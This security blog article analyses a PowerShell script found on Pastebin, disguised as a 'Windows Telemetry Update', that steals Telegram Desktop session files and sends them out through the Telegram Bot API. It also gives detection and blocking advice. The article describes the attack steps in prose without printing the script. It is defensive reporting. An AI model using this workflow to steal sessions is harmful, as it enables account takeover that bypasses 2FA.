In the world of cybercrime, sophistication isn’t always a requirement for success. Sometimes, all it takes is a clever name and a trusted platform. Security researchers at Flare recently uncovered a high-severity threat: a PowerShell script hosted on Pastebin designed to silently exfiltrate Telegram session data.
Disguised as a routine “Windows Telemetry Update,” the script preys on the tendency of users (and sometimes automated systems) to trust tasks that appear to be native Windows maintenance. While the tooling is minimal, its ability to bypass two-factor authentication (2FA) by stealing active session tokens makes it a potent weapon in an attacker’s arsenal.
How the Telegram Session Stealer Works
The attack chain is a masterclass in “living off the land,” utilizing legitimate Windows tools and public APIs to carry out a malicious mission.
1. Initial Reconnaissance
Upon execution, the script immediately gathers host metadata to provide the attacker with context. It queries api.ipify.org to log:
- The victim’s public IP address
- Local username and computer name
2. Targeting the tdata Directory
The script specifically hunts for the Telegram Desktop and Telegram Desktop Beta directories located in %APPDATA%. These folders contain the tdata files—the “crown jewels” of a Telegram installation that hold the encrypted session keys.
3. Circumventing File Locks
In a notable bit of functional logic, the script forcibly terminates any active Telegram processes. This releases file locks on the session database, ensuring the Compress-Archive command can successfully create a file named diag.zip in the user’s TEMP folder.
4. Exfiltration via Telegram Bot API
The script uses the Telegram Bot API (api.telegram.org) to send the stolen diag.zip directly to the attacker’s chat ID. If the primary sendDocument method fails, it includes a fallback UploadFile mechanism to ensure the data reaches its destination.
From Broken to Functional: The Developer’s Trail
What makes this discovery unique is the visibility into the attacker’s development cycle. Researchers found two versions of the script on Pastebin:
- Version 1 (v1): Contained a broken upload implementation. The “diag.zip” archive never actually reached the attacker.
- Version 2 (v2): Fixed the encoding issues, correctly implementing
multipart/form-datato successfully exfiltrate the data.
This “debugging in public” suggests that while the operator is capable of refining their tools, they rely on open-source platforms for testing, providing defenders a rare window into their operational readiness.
Technical Comparison: Desktop vs. Web Stealers
The threat isn’t limited to the desktop app. The infrastructure used by this PowerShell script shares a backend with a web-based session capture tool.
| Feature | Desktop Stealer (PowerShell) | Web Stealer (JavaScript/Browser) |
|---|---|---|
| Primary Target | %APPDATA%\Telegram Desktop\tdata | Browser localStorage |
| Key Artifacts | Session files, diag.zip | dcX_auth_key & MTProto keys |
| Bypass Capability | Bypasses 2FA/Passwords | Bypasses 2FA/Passwords |
| Exfiltration | Telegram Bot API / WebClient | Shared Telegram Bot Channel |
Export to Sheets
The Bottom Line: Once an attacker has these authorization keys, they can reconstruct your authenticated session on their own machine. They don’t need your password, and they don’t need your SMS verification code—they are already “logged in” as you.
Risk-Impact Analysis: Why This Matters
- Identity Theft: Attackers can send messages as the victim, facilitating lateral movement or spear-phishing within the victim’s network.
- Data Exposure: Access to the session means access to the entire chat history, including saved messages and private media.
- Low Barrier to Entry: Because the script uses plain PowerShell and is hosted on Pastebin, it is easily replicated and modified by lower-tier threat actors.
Actionable Steps: How to Secure Your Sessions
If you suspect a “Windows Telemetry Update” or any unauthorized PowerShell script has run on your system, follow these steps immediately:
For Individual Users
- Terminate Sessions: Open Telegram > Settings > Privacy and Security > Active Sessions. Select Terminate All Other Sessions.
- Reset 2FA: Even though the stealer bypasses it, changing your cloud password and resetting 2FA forces a re-authentication state that can invalidate stolen keys.
- Check for Persistence: Look for unusual tasks in Windows Task Scheduler that might be re-running the script.
For Enterprise Security Teams
- Network Blocking: In environments where Telegram is not a business requirement, block
api.telegram.organdweb.telegram.orgat the firewall. - Monitor PowerShell: Set up alerts for
Invoke-RestMethodorUploadFilecalls directed toward Telegram API domains, especially if the script is running from the%TEMP%directory. - Endpoint Detection: Flag any process that attempts to compress the
%APPDATA%\Telegram Desktopfolder.
FAQs
Q: Does Telegram’s Two-Step Verification protect against this? A: Not directly. Two-step verification protects the login process. This script steals an already authenticated session. Terminating active sessions is the only way to kick the attacker out.
Q: Is Pastebin dangerous? A: Pastebin is a legitimate tool for developers, but it is frequently abused by hackers to host “fileless” malware. Organizations should monitor for outbound connections to paste sites from non-developer workstations.
Q: How did the script get on my computer? A: While this specific script lacked an automated delivery mechanism, it is often bundled with “cracked” software, fake updates, or delivered via phishing emails.
Conclusion: The Cost of “Minimal” Sophistication
This Telegram session stealer proves that malware doesn’t need to be complex to be effective. By exploiting the trust users place in “Windows Updates” and the power of PowerShell, attackers can gain full access to private communications with just a few lines of code.
Don’t wait for a breach to happen. Take control of your active sessions and monitor your scripting environments for unauthorized telemetry.
